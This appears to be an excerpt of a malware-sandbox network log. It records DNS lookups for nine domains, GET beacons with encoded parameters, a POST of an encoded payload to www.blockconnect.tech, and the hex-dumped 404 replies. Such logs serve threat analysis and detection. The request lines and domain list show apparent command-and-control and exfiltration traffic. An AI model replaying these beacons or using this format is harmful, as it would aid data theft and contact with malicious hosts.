Source: global traffic	HTTP traffic detected: GET /bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMKpOinIiMZClj3zM1CqZGG9lmLXrV5MIhxFycB6Ix5Y/8KR9paRaaTHbT0ZPxs=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1Host: www.100millionjobs.africaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Source: global traffic	HTTP traffic detected: GET /t4o7/?PZtTT8P0=uJKBo1tKDv7YsektomxAe6xLUzKhSocRURbZYBlCa5gveKZ37rsA10kLqgKMu7eO65AngIyj7yeUeCYZeYghmIfm5PSli+U+Ur1GTnr4eXI8Tij3papz9cQ=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1Host: www.l33900.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Source: global traffic	HTTP traffic detected: GET /sbv2/?PZtTT8P0=KCOXl4L0MjZtpt9om/tmYw0VttOad0yMCs4OQKkXNc8VH0itCYxOihExehlokU3aZEnUGvFTmMELvqtU+Kox5tVgQ7KRBTJUg1vzgVjJ1xaulaVtzEKyyvI=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1Host: www.cikolatasampuan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Source: global traffic	HTTP traffic detected: GET /brgm/?-HT0=eZZx0LUhp4u8Nb7&PZtTT8P0=zZBAurvGVFID4gQja6K5puo946UQMWfD5PMg/RgwWhmYguwOMej1h7bKFXAKsHPKzWTIbqUmzdTnclHnVVtC51fb9z47H8HhLLvcw9Akuk8AFxTwcor1860= HTTP/1.1Host: www.buildfuture.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Source: global traffic	HTTP traffic detected: GET /s4sk/?PZtTT8P0=w1z0LxExs9MXILOhkTw/05qIOC9wPz9pW67ass2TZN6sDGg0GyeGaAU8sMVSePVNOj9ELn/nlJfz7v0haQuSr/gZC77LrnvOb7BfL6JpYx8NJq7/9PXIC+k=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1Host: www.accusolution.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Source: global traffic	HTTP traffic detected: GET /vslm/?PZtTT8P0=zC4zMG0SLXGKoOyqUI5Abkx/PzoLDn/S8PthLULLwKSzNefTy4ZudJoNt3Kk74AgS/gmI7rmIyltTNtABG2sKNdnUxIQu/0toq2WPl2/BEOTqysptoicMx8=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1Host: www.6hcwz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1

Source: global traffic	DNS traffic detected: DNS query: www.mraber.dev
Source: global traffic	DNS traffic detected: DNS query: www.blockconnect.tech
Source: global traffic	DNS traffic detected: DNS query: www.jackys.shop
Source: global traffic	DNS traffic detected: DNS query: www.100millionjobs.africa
Source: global traffic	DNS traffic detected: DNS query: www.l33900.xyz
Source: global traffic	DNS traffic detected: DNS query: www.cikolatasampuan.xyz
Source: global traffic	DNS traffic detected: DNS query: www.buildfuture.website
Source: global traffic	DNS traffic detected: DNS query: www.accusolution.pro
Source: global traffic	DNS traffic detected: DNS query: www.6hcwz.info

Source: unknown

HTTP traffic detected: POST /yrw8/ HTTP/1.1Host: www.blockconnect.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.blockconnect.techConnection: closeContent-Length: 205Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.blockconnect.tech/yrw8/User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Data Raw: 50 5a 74 54 54 38 50 30 3d 63 48 35 61 59 76 73 61 47 74 43 61 74 6c 75 79 36 34 37 51 33 57 42 63 76 51 34 4b 77 55 34 34 36 37 51 47 4c 55 6e 35 65 50 32 65 70 42 70 76 79 42 45 6d 62 51 54 54 32 30 4b 43 4b 4c 31 2b 4b 52 41 49 4f 6b 7a 74 4c 38 67 69 67 57 58 71 68 4e 6c 47 6a 2f 52 65 6a 43 76 59 34 6d 51 44 62 36 6b 6b 5a 32 54 53 66 6b 57 6b 68 70 4f 51 45 6e 73 4b 59 31 43 44 62 45 50 55 4a 34 63 70 36 73 34 51 4d 74 75 70 37 35 4e 69 46 30 72 48 30 6d 52 43 75 44 75 75 36 76 30 74 44 36 49 41 33 4b 57 7a 61 4a 38 77 32 42 43 77 54 45 30 52 59 32 5a 72 51 43 44 45 7a 79 38 34 4b 4c 31 74 33 67 3d 3d Data Ascii: PZtTT8P0=cH5aYvsaGtCatluy647Q3WBcvQ4KwU4467QGLUn5eP2epBpvyBEmbQTT20KCKL1+KRAIOkztL8gigWXqhNlGj/RejCvY4mQDb6kkZ2TSfkWkhpOQEnsKY1CDbEPUJ4cp6s4QMtup75NiF0rH0mRCuDuu6v0tD6IA3KWzaJ8w2BCwTE0RY2ZrQCDEzy84KL1t3g==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:38:23 GMTServer: Apache/2.4.10 (Debian)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 72 61 62 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.mraber.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:42:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xKvBkh9mpis8jnTG8LDpPPWCA5MSFwsiIUX5WFy3Ob2DFQ52CypHSgWrPtdc3HObqvSUjlHECVNHjBaz1lBF%2BQazl9n5PqlDyvbQ4q%2BIj7sYKhWtVf8tfdb9wTMKDkvjT3nuI7p4Wv%2FQdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90280138dcae1875-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1478&rtt_var=739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=833&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 94 5d 6f d3 30 14 86 ef f7 2b 0e 41 20 90 48 dc b4 1b a3 49 1a 69 b4 9b 40 e2 63 82 22 e0 d2 4b 4e 63 b3 c4 0e f6 69 da 30 f1 df 91 93 ac ed f8 12 17 38 37 ce f1 eb e7 3d 27 f6 49 72 6f f1 76 be fc 7c 79 0e 82 aa 12 2e 3f 3c 7f f5 72 0e 9e cf d8 c7 c9 9c b1 c5 72 01 9f 5e 2c 5f bf 82 30 18 c1 7b 32 32 23 c6 ce df 78 e0 09 a2 3a 62 6c b3 d9 04 9b 49 a0 4d c1 96 ef d8 d6 51 42 b7 6d 98 fa b6 db 13 e4 94 7b e9 51 d2 99 6c ab 52 d9 d9 6f 00 e1 74 3a ed f7 79 4e 14 95 5c 15 33 0f 95 07 bb 59 9a 08 e4 79 7a 04 00 90 90 a4 12 d3 e3 d1 31 3c ac 72 6e 45 0c 97 bc 40 78 a3 09 2e f4 5a e5 09 eb 15 bd ba 42 e2 e0 4c 7d fc ba 96 cd cc 9b 6b 45 a8 c8 5f b6 35 7a 90 f5 6f 33 8f 70 4b cc 25 11 43 26 b8 b1 48 b3 0f cb 0b ff 99 c7 0e 41 8a 57 38 f3 72 b4 99 91 35 49 ad 0e 08 2e 23 ff a7 5c 76 bb 2d b5 25 02 b5 35 0e 56 99 b5 5e bf e6 c6 95 ce 5b b8 59 69 45 be 95 df 30 0a 8f eb 6d 0c 99 2e b5 89 ee 9f 76 23 86 6e 79 c5 2b 59 b6 11 37 92 97 31 38 94 cf 4b 59 a8 28 43 45 68 e2 ef 3b a6 08 ef 10 9f 8d 0e 90 d3 e9 d9 e9 d9 45 0c 15 37 85 54 11 9c 8e ea 2d 8c dc 73 08 18 c3 4d af 87 fb 8b f3 a7 f3 93 c5 dd 1c 60 48 62 6f 02 e3 ce a4 0b 6c 50 16 82 22 b8 d2 65 1e 43 89 44 68 7c Data Ascii: 2ba]o0+A HIi@c"KNci087='Irov\|y.?<rr^,_0{22#x:blIMQBm{QlRot:yN\3Yyz1<rnE@x.ZBL}kE_5zo3pK%C&HAW8r5I.#\v-%5V^[YiE0m.v#ny+Y718KY(CEh;E7T-sM`HbolP"eCDh\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:42:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZ60YhbDIimWR5csHs6fRhf%2FKR5pKnJcOmZQNDMX6Kp4IFN6qtC245dYRpBHrjbF1T%2Fo5qz66X%2Fb3FmpzQGEuOQoJ0EQcjESCUT1iJ9f%2FTgCU3gd7PHEB9KuS8UZyl9MioE1J3PY5DYf1w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90280148ea3fc327-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1463&rtt_var=731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=853&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 94 5d 6f d3 30 14 86 ef f7 2b 0e 41 20 90 48 dc b4 1b a3 49 1a 69 b4 9b 40 e2 63 82 22 e0 d2 4b 4e 63 b3 c4 0e f6 69 da 30 f1 df 91 93 ac ed f8 12 17 38 37 ce f1 eb e7 3d 27 f6 49 72 6f f1 76 be fc 7c 79 0e 82 aa 12 2e 3f 3c 7f f5 72 0e 9e cf d8 c7 c9 9c b1 c5 72 01 9f 5e 2c 5f bf 82 30 18 c1 7b 32 32 23 c6 ce df 78 e0 09 a2 3a 62 6c b3 d9 04 9b 49 a0 4d c1 96 ef d8 d6 51 42 b7 6d 98 fa b6 db 13 e4 94 7b e9 51 d2 99 6c ab 52 d9 d9 6f 00 e1 74 3a ed f7 79 4e 14 95 5c 15 33 0f 95 07 bb 59 9a 08 e4 79 7a 04 00 90 90 a4 12 d3 e3 d1 31 3c ac 72 6e 45 0c 97 bc 40 78 a3 09 2e f4 5a e5 09 eb 15 bd ba 42 e2 e0 4c 7d fc ba 96 cd cc 9b 6b 45 a8 c8 5f b6 35 7a 90 f5 6f 33 8f 70 4b cc 25 11 43 26 b8 b1 48 b3 0f cb 0b ff 99 c7 0e 41 8a 57 38 f3 72 b4 99 91 35 49 ad 0e 08 2e 23 ff a7 5c 76 bb 2d b5 25 02 b5 35 0e 56 99 b5 5e bf e6 c6 95 ce 5b b8 59 69 45 be 95 df 30 0a 8f eb 6d 0c 99 2e b5 89 ee 9f 76 23 86 6e 79 c5 2b 59 b6 11 37 92 97 31 38 94 cf 4b 59 a8 28 43 45 68 e2 ef 3b a6 08 ef 10 9f 8d 0e 90 d3 e9 d9 e9 d9 45 0c 15 37 85 54 11 9c 8e ea 2d 8c dc 73 08 18 c3 4d af 87 fb 8b f3 a7 f3 93 c5 dd 1c 60 48 62 6f 02 e3 ce a4 0b 6c 50 16 82 22 b8 d2 65 1e 43 89 44 Data Ascii: 2c5]o0+A HIi@c"KNci087='Irov\|y.?<rr^,_0{22#x:blIMQBm{QlRot:yN\3Yyz1<rnE@x.ZBL}kE_5zo3pK%C&HAW8r5I.#\v-%5V^[YiE0m.v#ny+Y718KY(CEh;E7T-sM`HbolP"eCD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:42:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sodLTX4Z1cooQLez6d0hwzwJfywcKCNx6vZ%2BTezpGQSDoY6GjGOf3etiLambYEcNcZ1GSsvIQTEUQU1l9rql87L6B3sQJlFHmhZL2lhs%2FkXc%2B%2BMXno28Rf%2BHnaVXc5lymX6PYNxmZlji9g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90280158ef4241a6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10935&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 94 5d 6f d3 30 14 86 ef f7 2b 0e 41 20 90 48 dc b4 1b a3 49 1a 69 b4 9b 40 e2 63 82 22 e0 d2 4b 4e 63 b3 c4 0e f6 69 da 30 f1 df 91 93 ac ed f8 12 17 38 37 ce f1 eb e7 3d 27 f6 49 72 6f f1 76 be fc 7c 79 0e 82 aa 12 2e 3f 3c 7f f5 72 0e 9e cf d8 c7 c9 9c b1 c5 72 01 9f 5e 2c 5f bf 82 30 18 c1 7b 32 32 23 c6 ce df 78 e0 09 a2 3a 62 6c b3 d9 04 9b 49 a0 4d c1 96 ef d8 d6 51 42 b7 6d 98 fa b6 db 13 e4 94 7b e9 51 d2 99 6c ab 52 d9 d9 6f 00 e1 74 3a ed f7 79 4e 14 95 5c 15 33 0f 95 07 bb 59 9a 08 e4 79 7a 04 00 90 90 a4 12 d3 e3 d1 31 3c ac 72 6e 45 0c 97 bc 40 78 a3 09 2e f4 5a e5 09 eb 15 bd ba 42 e2 e0 4c 7d fc ba 96 cd cc 9b 6b 45 a8 c8 5f b6 35 7a 90 f5 6f 33 8f 70 4b cc 25 11 43 26 b8 b1 48 b3 0f cb 0b ff 99 c7 0e 41 8a 57 38 f3 72 b4 99 91 35 49 ad 0e 08 2e 23 ff a7 5c 76 bb 2d b5 25 02 b5 35 0e 56 99 b5 5e bf e6 c6 95 ce 5b b8 59 69 45 be 95 df 30 0a 8f eb 6d 0c 99 2e b5 89 ee 9f 76 23 86 6e 79 c5 2b 59 b6 11 37 92 97 31 38 94 cf 4b 59 a8 28 43 45 68 e2 ef 3b a6 08 ef 10 9f 8d 0e 90 d3 e9 d9 e9 d9 45 0c 15 37 85 54 11 9c 8e ea 2d 8c dc 73 08 18 c3 4d af 87 fb 8b f3 a7 f3 93 c5 dd 1c 60 48 62 6f 02 e3 ce a4 0b 6c 50 16 82 22 b8 d2 Data Ascii: 2c5]o0+A HIi@c"KNci087='Irov\|y.?<rr^,_0{22#x:blIMQBm{QlRot:yN\3Yyz1<rnE@x.ZBL}kE_5zo3pK%C&HAW8r5I.#\v-%5V^[YiE0m.v#ny+Y718KY(CEh;E7T-sM`HbolP"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:42:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mYb6WjdZxFs1DB1vIj%2BMVcj63QkmoGNtu%2BmSvGdLvD2btihTmKLkg7Gx3mVvQ6QXMGKicI8yOe9i5taSG%2B9Gd7j7Zns5uQEPOJhlOEjxLJNGxgs7ILgEz8y33vALxivx%2FQt2%2Fop9J%2Bzujg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90280168ae2a72b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=559&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 Data Ascii: 581<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14p
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:42:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:42:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:42:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
